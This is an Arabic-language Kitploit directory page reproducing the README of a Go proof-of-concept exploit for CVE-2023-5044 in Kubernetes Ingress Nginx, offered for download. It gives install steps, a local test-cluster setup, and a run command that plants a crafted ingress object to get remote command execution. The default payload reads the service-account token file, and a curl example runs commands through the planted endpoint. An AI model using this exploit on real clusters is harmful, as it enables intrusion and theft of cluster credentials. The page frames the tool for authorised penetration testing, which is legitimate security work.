Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
cve-2023-5044 — استغلال إثبات المفهوم مبني على Go لـ CVE-2023-5044 في Ingress Nginx، يقوم بأتمتة تنفيذ التعليمات البرمجية عن بُعد عبر كائنات ingress مصممة خصيصًا في مجموعات Kubernetes. | Kitploit
أدوات/GitHubGitHub/4armed/cve-2023-5044
أمن الحاوياتتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقأمن السحابةالقيادة والسيطرةالفريق الأحمر
GitHub4armed/cve-2023-5044

cve-2023-5044

استغلال إثبات المفهوم مبني على Go لـ CVE-2023-5044 في Ingress Nginx، يقوم بأتمتة تنفيذ التعليمات البرمجية عن بُعد عبر كائنات ingress مصممة خصيصًا في مجموعات Kubernetes.

عرض المستودع
21منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2023-5044 إثبات المفهوم لاستغلال Ingress Nginx

هذا برنامج Go سريع لاستغلال الثغرة CVE الأخيرة في وحدة التحكم Ingress Nginx.

التفاصيل حول كيفية القيام بذلك موجودة بالفعل عبر مدونة Rory McCune على https://raesene.github.io/blog/2023/10/29/exploiting-CVE-2023-5044/، هذا فقط يؤتمت العملية قليلاً وينظم الاستغلال ليكون حمولة تنفيذ تعليمات برمجية عن بُعد أكثر مرونة وعمومية.

التثبيت

root@kitploit:~
% go install github.com/4armed/cve-2023-5044@latest

مجموعة اختبار

ستحتاج إلى مجموعة لتشغيل الأداة ضدها، تعمل بإصدار ضعيف من ingress-nginx (بالطبع). إذا لم يكن لديك مجموعة تختبر ضدها، يمكنك إنشاء مجموعة Kind عن طريق استنساخ هذا المستودع واستخدام ملف Makefile في مجلد deploy.

root@kitploit:~
% git clone github.com/4armed/cve-2023-5044
% cd cve-2023-5044/deploy && make up

إذا تركت ملف kind.yaml كما هو، ستحصل على مجموعة مربوطة بـ localhost الخاص بك على المنفذ 30080 و 30443.

الاستخدام

root@kitploit:~
% cve-2023-5044 run -u http://localhost:30080
2024/01/17 14:10:48 INFO checking permissions
2024/01/17 14:10:48 INFO created ingress object namespace=default name=forearmed-poc-hm48l
2024/01/17 14:10:48 INFO exploit at http://localhost:30080/4armed?cmd=cat+%2Fvar%2Frun%2Fsecrets%2Fkubernetes.io%2Fserviceaccount%2Ftoken"

سطر "التحقق من الأذونات" هو لأن الأداة تقوم بمراجعة الوصول للموضوع للتحقق من أن لديك أذونات لإنشاء Ingress. إذا لم يكن لديك، ستخرج عند تلك النقطة. إذا كان لديك صلاحية التحرير على Ingress موجود، يمكنك بالتأكيد استخدام الاستغلال لتحقيق اختراق، لكنه معقد للغاية لأتمتة تحديث Ingress موجود دون كسر الأشياء.

المسار الافتراضي لتشغيل الاستغلال هو /4armed ويقرأ وينفذ قيمة معلمة سلسلة الاستعلام cmd.

سيقوم بطباعة مثال URL مع الأمر الافتراضي cat /var/run/secrets/kubernetes.io/serviceaccount/token. يمكنك تغيير هذا باستخدام العلم -e أو ببساطة توفير قيمة مختلفة في معامل cmd. الاستغلال ليس مقيدًا بشكل ثابت. لا تحتاج إلى نشر ingress جديد.

root@kitploit:~
%  curl 'http://localhost:30080/4armed?cmd=id'
uid=101(www-data) gid=82(www-data)

اسم كائن ingress يتم عشوائياً باستخدام GenerateName لذا انتبه إلى المخرجات ونظف بعد نفسك.

root@kitploit:~
% kubectl delete ingress forearmed-poc-hm48l
ingress.networking.k8s.io "forearmed-poc-hm48l" deleted

إذا كنت تريد فقط إنشاء كائن ingress استخدم:

root@kitploit:~
% cve-2023-5044 generate

إخلاء مسؤولية

هذا لأغراض الاختبار فقط ضد مجموعة لديك إذن لها. إذا استخدمته ضد مجموعة، سواء كان لديك إذن أم لا، فإن المؤلف لا يتحمل أي مسؤولية عن أي ضرر أو مشاكل ناتجة. تم أخذ كل الحرص لاختيار قيم مسار لا تتعارض مع القيم الموجودة، يمكنك تجاوزها باستخدام الأعلام أو تغيير الكود إذا لزم الأمر، ولكن قد تظل قادرًا على كسر شيء ما. تأكد من أنك تعرف ما تفعله.

تنزيل الأداة